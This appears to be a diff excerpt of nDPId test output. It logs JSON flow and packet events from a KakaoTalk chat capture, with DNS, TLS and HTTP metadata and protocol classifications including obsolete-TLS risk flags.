00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069026370,"flow_last_seen":1430069027422,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1430069027422,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069028075,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1430069028075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069028075,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgUEEAA+AZ+3XgcGvIKGFK8AFCGx0Ds0yKXy0vyUBQAAEEKAAA="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022297,"flow_last_seen":1430069022297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069022297,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1430069022297,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069022297,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzzVkAAPwZJoAoYUrxn9jn7x00fkMsN9JkAAAAAoAI5CGIPAAACBAV4BAIICgALB88AAAAAAQMDBw=="}
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1430069022411,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069022411,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALQZO92f2OfsKGFK8H5DHTSs\/AzbLDfSaoBIWoGVTAAACBAV4BAIICpj2V6UACwfPAQMDCQ=="}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1430069022419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069022419,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADTzV0AAPwZJpwoYUrxn9jn7x00fkMsN9JorPwM3gBAAc6oGAAABAQgKAAsH25j2V6U="}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069026012,"flow_last_seen":1430069026012,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069026012,"l3_proto":"ip4","src_ip":"216.58.221.10","dst_ip":"10.24.82.188","src_port":80,"dst_port":35922,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1430069026012,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069026012,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcACiq7kAArAYRrNg63QoKGFK8AFCMUmKi4jFDN+TzUBH\/\/6QYAAA="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1430069026058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069026058,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgAAEAAPwYptwoYUrzYOt0KjFIAUEM35dFioucAUBA+dl\/2AAA="}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1430069026148,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069026148,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcACiq70AArQYQq9g63QoKGFK8AFCMUmKi4jFDN+TzUBH\/\/6QYAAA="}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069026370,"flow_last_seen":1430069026370,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069026370,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1430069026370,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069026370,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzmtkAAPwbpMgoYUryt\/GECiq8Bu\/wa79AAAAAAoAI5CCGaAAACBAV4BAIICgALCWYAAAAAAQMDBw=="}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1430069027366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069027366,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzmt0AAPwbpMQoYUryt\/GECiq8Bu\/wa79AAAAAAoAI5CCE2AAACBAV4BAIICgALCcoAAAAAAQMDBw=="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1430069027408,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069027408,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACyOBEAA+AaI9K38YQIKGFK8AbuKr2Aiq0X8Gu\/RYBIRHJekAAACBAV4"}
00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069026370,"flow_last_seen":1430069027422,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1430069027422,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069028075,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1430069028075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069028075,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgUEEAA+AZ+3XgcGvIKGFK8AFCGx0Ds0yKXy0vyUBQAAEEKAAA="}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030083,"flow_last_seen":1430069030083,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069030083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1430069030083,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1430069030083,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBHSGwoYUrwKvAEB7lMANQAt50i5OgEAAAEAAAAAAAAJcGx1cy10YWxrBWtha2FvA2NvbQAAAQAB"}
00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030083,"flow_last_seen":1430069030083,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069030083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"plus-talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -88,150 +88,150 @@
00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030119,"flow_last_seen":1430069030119,"flow_idle_time":120000,"flow_min_l4_payload_len":111,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1430069030119,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","l4_proto":"icmp","flow_datalink":113,"flow_max_packets":3}
00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1430069030119,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":147,"pkt_l4_len":111,"thread_ts_msec":1430069030119,"pkt":"AAQCEgAAAAAAAAAAAAAIAEXAAIMZuAAAQAE5cQoYUrwKvL8BAwMj8wAAAABFAABn\/dEAADURYSMKvL8BChhSvAA17lMAUxMnuTqBgAABAAIAAAAACXBsdXMtdGFsawVrYWthbwNjb20AAAEAAcAMAAUAAQAAA5UACgRwbHVzAmdswBbAMQABAAEAAADJAATSZ\/AP"}
00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030119,"flow_last_seen":1430069030119,"flow_idle_time":120000,"flow_min_l4_payload_len":111,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1430069030119,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.755603}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030121,"flow_last_seen":1430069030121,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069030121,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1430069030121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030121,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwrfUAAPwbw8woYUrzSZ\/APk70Bu6\/qIaMAAAAAoAI5CH35AAACBAV4BAIICgALCt4AAAAAAQMDBw=="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1430069030159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069030159,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACwUQ0AA+AZPPdJn8A8KGFK8AbuTvWC6rQuv6iGkYBIRHPMdAAACBAV4"}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1430069030162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030162,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgrfkAAPwbxBgoYUrzSZ\/APk70Bu6\/qIaRguq0MUBA5COKyAAA="}
00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030121,"flow_last_seen":1430069030171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069030171,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01092{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069030121,"flow_last_seen":1430069030296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1496,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1430069030296,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1430069030121,"flow_last_seen":1430069030336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3736,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1430069030336,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.kakao.com","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Thawte, Inc., CN=Thawte SSL CA","subjectDN":"C=KR, ST=Gyeonggi-do, L=Seongnam-si, O=Kakao Corp., CN=*.kakao.com","fingerprint":"0D:14:6D:8D:5E:EB:F5:F5:42:87:CD:AB:AE:A1:DC:AA:5A:76:6F:E4"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030508,"flow_last_seen":1430069030508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069030508,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1430069030508,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030508,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADz6+UAAPwaAjQoYUrwfDURUkrEAUI6+8f0AAAAAoAI5CDAyAAACBAV4BAIICgALCwQAAAAAAQMDBw=="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1430069030549,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069030549,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACy6BkAA+AYIkB8NRFQKGFK8AFCSsWQ58S+OvvH+YBIRHF3ZAAACBAV4"}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1430069030552,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030552,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACj6+kAAPwaAoAoYUrwfDURUkrEAUI6+8f5kOfEwUBA5CE1uAAA="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030557,"flow_last_seen":1430069030557,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069030557,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1430069030557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":83,"pkt_l4_len":47,"thread_ts_msec":1430069030557,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAEMbkEAAjgYQ+x8NREkKGFK8Abu3n2dAc1oKhoE3UBigBOCLAAAVAwEAFgdiLTjhEFi+7He1g59CCs5hRzaz7rI="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1430069030557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030557,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgOyEAAQAZr3goYUrwfDURJt58BuwqGgTdnQHN1UBBuKMBEAAA="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1430069030557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030557,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgbkUAAjgYRFR8NREkKGFK8Abu3n2dAc3UKhoE3UBGgBC\/XAAA="}
00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030508,"flow_last_seen":1430069030600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069030600,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.3.0.KXDMICB)"}}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030121,"flow_last_seen":1430069030121,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069030121,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1430069030121,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030121,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwrfUAAPwbw8woYUrzSZ\/APk70Bu6\/qIaMAAAAAoAI5CH35AAACBAV4BAIICgALCt4AAAAAAQMDBw=="}
